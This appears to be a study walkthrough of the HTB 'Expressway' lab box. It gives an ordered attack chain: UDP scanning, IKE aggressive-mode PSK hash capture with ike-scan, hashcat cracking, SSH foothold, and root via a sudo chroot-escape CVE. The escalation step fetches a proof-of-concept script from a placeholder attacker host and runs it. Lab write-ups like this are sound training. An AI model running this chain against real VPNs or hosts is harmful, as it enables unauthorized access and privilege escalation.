Date: 2025-12-04
Box: HTB — Expressway (Pentest Study Note)
Box: HTB — Expressway (Pentest Study Note)
HTB Expressway – Pentest Walkthrough Notes
1. Initial Enumeration
Full TCP + UDP scan:
nmap -sC -sV -sU -p- <IP>Findings:
- 22/tcp – SSH
- 500/udp – IKE / ISAKMP
The key discovery is UDP/500, which indicates an IPsec/IKE VPN service.
2. IKE Enumeration & PSK Hash Capture
Using ike-scan in Aggressive Mode reveals identity + PSK material:
ike-scan --aggressive --multiline <IP> --pskcrack=psk.outResults revealed:
- Identity:
[email protected] - A crackable PSK hash saved in
psk.out
3. Offline PSK Cracking
Hashcat attack mode for IKE-PSK SHA1:
hashcat -m 5400 psk.out rockyou.txt --attack-mode 0This successfully recovered a usable PSK/password.
4. Foothold – SSH Access
Recovered credentials allowed SSH login:
ssh ike@<IP>Gains a normal user shell as ike.
5. Privilege Escalation – Vulnerable Sudo
Check the sudo binary path:
which sudo
/usr/local/bin/sudoThis indicates a manually installed build. Version check:
sudo --version
Sudo version 1.9.17This version is vulnerable to CVE-2025-32463 (“sudo chroot escape”).
Download PoC exploit on the machine:
wget http://<attacker>/sudo-chwoot.sh
chmod +x sudo-chwoot.sh
./sudo-chwoot.shAfter running the exploit:
# whoami
root6. Flags
cat /home/ike/user.txt
cat /root/root.txt7. OSCP-Style Key Takeaways
- UDP enumeration is mandatory. Critical service (IKE) was only exposed over UDP.
- Aggressive Mode in IKE is dangerous: leaks identity + PSK data.
- Weak crypto (3DES/SHA1) made cracking feasible.
- Manual sudo installation hides vulnerabilities. Binary lived in
/usr/local/bin. - Privilege escalation required public CVE exploit for sudo.